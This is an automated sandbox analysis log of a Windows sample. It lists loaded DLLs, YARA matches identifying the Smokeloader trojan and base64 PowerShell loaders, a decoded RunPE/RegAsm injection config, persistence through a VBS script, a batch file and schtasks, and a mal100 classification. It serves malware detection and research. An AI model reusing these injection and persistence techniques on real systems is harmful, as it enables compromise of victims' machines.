Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll
Uses 32bit PE files
Source: xwREqjHUEv.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2964, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5720, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs Base64 encoded string: 'RmFsc2V8RmFsc2V8VHJ1ZXxGYWxzZXxGYWxzZXxGYWxzZXxjdnRyZXN8VW5kTGRsfGV4ZXwyMDAwfFJlZ0FzbS5leGV8djR8cnVuUEU='
Source: 13.3.OpenWith.exe.24aba862410.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.8.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.18.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.13.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.3.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.4.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.17.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.19.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: powershell.exe, 00000006.00000002.2117709095.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: pRi+QCH[j]N|[RJ/T#*us/x`yq/oTuI`SOI_tU+q@s/n#`J_Our5n.slN5jxqxiNLNBvhVp(tp]ij.@\Lxko5*/k
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@61/35@1/2
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403532
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004049C7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102262C CreateToolhelp32Snapshot,Thread32First,Thread32Next,FindCloseChangeNotification,SuspendThread, 14_2_000001FF7102262C
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004021AF CoCreateInstance, 0_2_004021AF
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File created: C:\Users\user\start.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Mutant created: \Sessions\1\BaseNamedObjects\ab10c56eed80d1785b81ee2fcb4bec96
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File created: C:\Users\user\AppData\Local\Temp\nsxD243.tmp Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: xwREqjHUEv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: xwREqjHUEv.exe Virustotal: Detection: 23%
Source: F324.exe String found in binary or memory: {df9dc55e-7bf4-fce3-add0-fbbcbfc59bae}
